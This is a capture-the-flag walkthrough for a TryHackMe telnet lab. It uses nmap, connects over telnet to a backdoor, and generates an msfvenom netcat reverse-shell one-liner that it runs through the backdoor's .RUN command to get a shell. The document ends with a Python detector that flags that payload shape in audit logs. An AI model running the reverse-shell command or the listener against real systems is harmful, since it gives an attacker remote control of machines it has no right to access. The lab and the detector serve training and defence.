TryHackMe | Cyber Security Training

Telnet is an application-layer protocol that lets a telnet client connect to a remote machine running a telnet server and execute commands on it.

The telnet client establishes a connection with the server and then acts as a virtual terminal, allowing you to interact with the remote host.

Telnet sends all messages in clear text and has no security mechanisms of its own, so anyone who can capture the traffic can read it. Telnet has been replaced by SSH in most production environments.

The user connects to the server using the Telnet protocol and then executes commands on it by typing them at the Telnet prompt. You can connect to a telnet server with the following syntax:

telnet [ip] [port]

Analyze that box

sudo nmap -A -O -p- 10.10.147.86

PORT     STATE SERVICE VERSION
8012/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_    SKIDY'S BACKDOOR. Type .HELP to view commands

Why SKIDY, why???!!! Connect to it:

telnet 10.10.200.201 8012


Trying 10.10.200.201...
Connected to 10.10.200.201.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
ls -- nothing....
.HELP
.HELP: View commands
.RUN : Execute commands
.EXIT: Exit
.RUN whoami -- nothing....
.RUN ls  -- nothing....
.RUN ping 10.13.12.54 -c 1

That 10.13.12.54 is my attacking machine's tun0 address, the IP assigned by the running VPN.....

SWITCH TERMINALS
We’re going to generate a reverse shell payload using msfvenom. We don’t need tcpdump anymore, so kill it. Let’s set the lport environment variable for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.

export lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R

Here is the generic form of the msfvenom command for generating a reverse shell payload. It produces a raw netcat reverse shell command for you:

msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

msfvenom -p cmd/unix/reverse_netcat lhost=10.13.12.54 lport=4444 R

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

nc -lvp 4444

That sets up netcat as a listener on port 4444:

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Cool, now run the last line printed out (the payload) back in Skidy's telnet terminal:

.RUN mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Then it pops in the other terminal!!!!!!

nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
ls
Ncat: Connection from 10.10.200.201.
Ncat: Connection from 10.10.200.201:55650.
flag.txt
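From the defender's side, the payload msfvenom produced above has a fixed shape worth recognising in process or command audit logs: a FIFO is created, nc reads its stdin from it, nc's output is piped into a shell, and the shell's output is written back into the same FIFO. The following detector is an added example (not part of the original walkthrough or of msfvenom); the log lines it scans are constructed, and the `user=... cmd=...` layout is an assumed format.

```python
import re
from dataclasses import dataclass

# Shape of the cmd/unix/reverse_netcat payload: mkfifo a pipe, feed it to nc's
# stdin, pipe nc's output into a shell, send the shell's output into the SAME pipe.
_PATH = r"[^\s;|&<>]+"
_FIFO_RE = re.compile(r"\bmkfifo\s+(?P<fifo>" + _PATH + r")")
_NC_RE = re.compile(
    r"\b(?:nc|ncat|netcat)\s+(?P<host>[\w.\-:]+)\s+(?P<port>\d{1,5})\b"
    r"[^|;]*?0?<\s*(?P<infifo>" + _PATH + r")"
    r"\s*\|\s*(?P<shell>(?:/bin/)?(?:ba|da)?sh)\b"
    r"[^;|]*?>\s*(?P<outfifo>" + _PATH + r")"
)

@dataclass(frozen=True)
class ReverseShellHit:
    fifo: str
    host: str  # callback address the compromised host connects out to
    port: int
    shell: str

def detect_fifo_reverse_shell(cmdline: str) -> "ReverseShellHit | None":
    """Return hit details if cmdline has the mkfifo + nc + shell loop, else None."""
    fifo_m, nc_m = _FIFO_RE.search(cmdline), _NC_RE.search(cmdline)
    if not fifo_m or not nc_m:
        return None
    fifo = fifo_m.group("fifo")
    # One FIFO used as nc's stdin AND the shell's stdout is what turns two one-way
    # pipes into a full-duplex shell; a pipe used one way is ordinary plumbing.
    if nc_m.group("infifo") != fifo or nc_m.group("outfifo") != fifo:
        return None
    port = int(nc_m.group("port"))
    if not 0 < port < 65536:
        return None
    return ReverseShellHit(fifo, nc_m.group("host"), port, nc_m.group("shell"))

def scan_command_log(lines) -> list:
    """Return (line_number, hit) for every log line carrying the payload shape."""
    hits = [(n, detect_fifo_reverse_shell(l)) for n, l in enumerate(lines, 1)]
    return [(n, h) for n, h in hits if h is not None]

# Constructed per-command audit log (not real data): line 2 is the exact
# payload msfvenom produced above, line 3 is a benign FIFO use.
SAMPLE_LOG = [
    "2021-03-01T10:00:01 user=skidy cmd=ls -la /home",
    "2021-03-01T10:00:07 user=skidy cmd=mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 "
    "0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx",
    "2021-03-01T10:00:09 user=skidy cmd=mkfifo /tmp/b.pipe; tail -f /tmp/b.pipe | tee -a b.log",
]
```

Running `scan_command_log(SAMPLE_LOG)` flags only line 2, reporting the callback host 10.13.12.54 and port 4444, which is exactly the listener address a responder would want to block and hunt for.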